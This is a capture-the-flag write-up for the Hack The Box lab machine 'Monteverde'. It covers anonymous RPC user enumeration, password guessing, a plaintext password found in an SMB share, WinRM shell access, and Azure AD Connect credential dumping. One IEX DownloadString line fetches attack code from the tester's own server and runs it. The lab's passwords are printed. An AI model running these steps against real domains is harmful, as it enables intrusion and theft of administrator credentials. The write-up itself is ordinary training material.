Summary:
- Find credentials for user account over
msrpc. - Use credentials to enumerate SMB to discover more credentials.
- Exploit loose user permissions to dump Administrator credentials using Azure-ADConnect
Setup:
Add the box IP to our /etc/hosts file.
$ printf "10.10.10.172\tmonteverde.htb\n" >> /etc/hosts
Enumeration:
Perform detailed portscan on the lower ports of cascade.htb using nmap to gather information on any exposed services. Then, perform a less resolute portscan to identify any open higher ports.
$ sudo nmap -sC -sV monteverde.htb -oA nmap/initial; sleep 300 && \
sudo nmap -p- -sS monteverde.htb -oA nmap/all-ports
$ cat nmap/initial.nmap
# Nmap 7.80 scan initiated Mon Apr 6 16:05:13 2020 as: nmap -Pn -sC -sV -oA nmap/initial monteverde.htb
Nmap scan report for monteverde.htb (10.10.10.172)
Host is up (0.041s latency).
Not shown: 989 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-04-06 14:27:52Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=4/6%Time=5E8B453B%P=x86_64-unknown-linux-gnu%r(
SF:DNSVersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07vers
SF:ion\x04bind\0\0\x10\0\x03");
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -37m34s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-04-06T14:30:13
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Apr 6 16:09:57 2020 -- 1 IP address (1 host up) scanned in 283.52 seconds
Kerberos stands out as an exploitable service for later. If we look at the LDAP services, the box has MEGABANK.LOCAL0 as its FQDN, we add this to our hosts file along with monteverde.htb. Before we can interact with kerberos, we need to enumerate user accounts. A common theme is unsecured msrpc which allows us to anonymously connect and dump user account information.
$ rpcclient //monteverde.htb -U "" -N
Unable to initialize messaging context
rpcclient $> enumdomusers
user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]
User:
If we try the username as the password for each user we have success with SABatchJobs. Next, we enumerate SMB as an authenticated user.
$ python smbmap.py -H monteverde.htb -u SABatchJobs -p SABatchJobs
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.172...
[+] IP: 10.10.10.172:445 Name: monteverde.htb
Disk Permissions Comment
---- ----------- -------
...
.
dr--r--r-- 0 Fri Jan 3 13:12:48 2020 .
dr--r--r-- 0 Fri Jan 3 13:12:48 2020 ..
dr--r--r-- 0 Fri Jan 3 13:15:23 2020 dgalanos
dr--r--r-- 0 Fri Jan 3 13:41:18 2020 mhope
dr--r--r-- 0 Fri Jan 3 13:14:56 2020 roleary
dr--r--r-- 0 Fri Jan 3 13:14:28 2020 smorgan
users$ READ ONLY
After inspecting each folder we find what appears to be a config file.
smb: \mhope\> dir
. D 0 Fri Jan 3 13:41:18 2020
.. D 0 Fri Jan 3 13:41:18 2020
azure.xml AR 1212 Fri Jan 3 13:40:23 2020
524031 blocks of size 4096. 519955 blocks available
Downloading this locally and opening we discover a password for mhope.
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
<T>System.Object</T>
</TN>
<ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
<Props>
<DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
<DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
<G N="KeyId">00000000-0000-0000-0000-000000000000</G>
<S N="Password">4n0therD4y@n0th3r$</S>
</Props>
</Obj>
</Objs>
We can now logon to the box using evil-winrm over wsman then collect our flag.
$ evil-winrm -P 5985 -u mhope -p "4n0therD4y@n0th3r$" -i monteverde.htb
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mhope\Documents> dir ../Desktop/user.txt
Directory: C:\Users\mhope\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 1/3/2020 5:48 AM 32 user.txt
Root: We look at the groups mhope is in to look for loose permissions.
*Evil-WinRM* PS C:\Users\mhope\Documents> net user mhope
User name mhope
Full Name Mike Hope
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/2/2020 4:40:05 PM
Password expires Never
Password changeable 1/3/2020 4:40:05 PM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory \\monteverde\users$\mhope
Last logon 4/22/2020 4:18:30 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Azure Admins *Domain Users
The command completed successfully.
We see mhope is a member of Azure Admins, some searching leads us to Azure-ADConnect.ps1. The HTB VPN doesn’t allow external connections so we download theh script to our local machine then spawn a HTTP server.
$ wget "https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/master/Privesc/Azure-ADConnect.ps1"
--2020-04-22 13:57:52-- https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/master/Privesc/Azure-ADConnect.ps1
Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.60.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.60.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2264 (2.2K) [text/plain]
Saving to: ‘Azure-ADConnect.ps1’
Azure-ADConnect.ps1 100%[===========================================>] 2.21K --.-KB/s in 0s
2020-04-22 13:57:52 (25.9 MB/s) - ‘Azure-ADConnect.ps1’ saved [2264/2264]
$ python -m http.server
Once downloaded we import the script on the remote machine then exploit.
*Evil-WinRM* PS C:\Users\mhope\Documents> IEX (New-Object Net.WebClient).DownloadString('http://10.10.XX.XX:8000/Azure-ADConnect.ps1');
*Evil-WinRM* PS C:\Users\mhope\Documents> Azure-ADConnect -server 127.0.0.1 -db ADSync
[+] Domain: MEGABANK.LOCAL
[+] Username: administrator
[+]Password: d0m@in4dminyeah!
We now have the Administrator credentials which we can use to connect to the box then read root.txt.
$ evil-winrm -P 5985 -u Administrator -p "d0m@in4dminyeah!" -i monteverde.htb
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir ../Desktop/root.txt
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 1/3/2020 5:48 AM 32 root.txt